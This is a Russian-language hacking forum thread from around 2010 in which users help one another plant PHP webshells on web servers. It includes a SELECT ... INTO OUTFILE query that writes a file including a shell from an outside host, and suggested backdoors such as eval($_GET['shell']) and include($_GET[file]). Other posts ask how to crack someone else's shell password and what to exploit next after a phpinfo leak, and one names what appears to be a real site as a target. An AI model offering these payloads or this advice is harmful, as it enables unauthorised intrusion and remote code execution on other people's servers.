Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Такая ситуация:
    Есть PhpMyAdin права полный Root
    Делаю запрос вида
    select '<? @include("http://site.ru/files/shell.txt"); ?>' into outfile 'D:/WWW/files/shell.php';
    Создаеться файл .php, но когда захожу на него, там пустой белый лист!!!

    А когда делаю запрос
    select '<? phpinfo(); ?>' into outfile 'D:/WWW/files/info.php';
    выводиться полный phpinfo!!

    что может быть не так?
     
  2. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    попробуй залить include($_GET[file]) ...
     
  3. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    я извиняюсь, мой пост затерялся, поетому спрошу ещё раз.

    с php вобще ничего не показывает.
    возможно. как в этом случае можно глянуть какая функция используется.
     
  4. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163

    allow_url_include off скорее всего
     
  5. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    .:[melkiy]:.
    Я с табой соглашусь!

    А по подробнее можно. А то я раньше таким не рользовался!
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    лучше eval($_GET['shell']);



    там не инклюд, а читалка
     
  7. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    залить скрипт аплоада и через него лить уже обычный шелл

    ЗЫ:Не трезв...
     
  8. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
    Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1
     
  9. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159

    Потом http://site.com/files/shell.php?var=phpinfo();
     
    #12669 Twoster, 4 May 2010
    Last edited: 4 May 2010
  10. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Спасибо большое. Но чё то или я туплю или даже хз, но в логах ngnix , но в логах чё то не появляется мой запрос :(
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.meningrey.net/%5c/
    Что это за уязвимость такая? Где об этом можно почитать?
     
  12. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    есть шелл с парольом..
    как моjно наыти пароль ?
    и пароль изменилось не стандартниы..
    напримерь в wso парол root а здес что то друqое ..
    как наыти ??
     
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    читалка обычная походу.. и mod_rewrite обычный
     
  14. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Да phpinfo то выводит без проблем!!
    П ричем var не работает, только cmd!

    И что ещо можно сделать через команду cmd ??
     
    #12674 GOGA075, 4 May 2010
    Last edited: 4 May 2010
  15. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ммм.. а как скрипт будет различать опасные файлы по твоему?

    он же работает на стороне клиента..исходники ему не видны :rolleyes:
     
    _________________________
    1 person likes this.
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    http://slil.ru/29081007 вот, если я правильно понял. Ищит залитые шеллы на сторонних сайтах по их имени (r57.php,c99.php,c100.php и тд).

    Если на своем сервере нужно найти модифицированные файлы или шеллы, то вот http://slil.ru/29081093
     
    #12677 h00lyshit!, 4 May 2010
    Last edited: 4 May 2010
    1 person likes this.
  18. oko

    oko New Member

    Joined:
    1 May 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Подскажите дальнейшие действия, есть доступ к phpinfo.php там естесвенно подробная инфа и пути к сайту что дальше делать? может ссылку на какую нибудь статью или еще что то... проверка всего сайта не sql , php иньекций и не Xss не вывело
     
    #12678 oko, 5 May 2010
    Last edited: 5 May 2010
  19. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    простое phpinfo тебе ничего особо полезного не даст.
     
  20. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    Не смог раскрутить. Кто что скажет?
    Code:
    chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1
     
Thread Status:
Not open for further replies.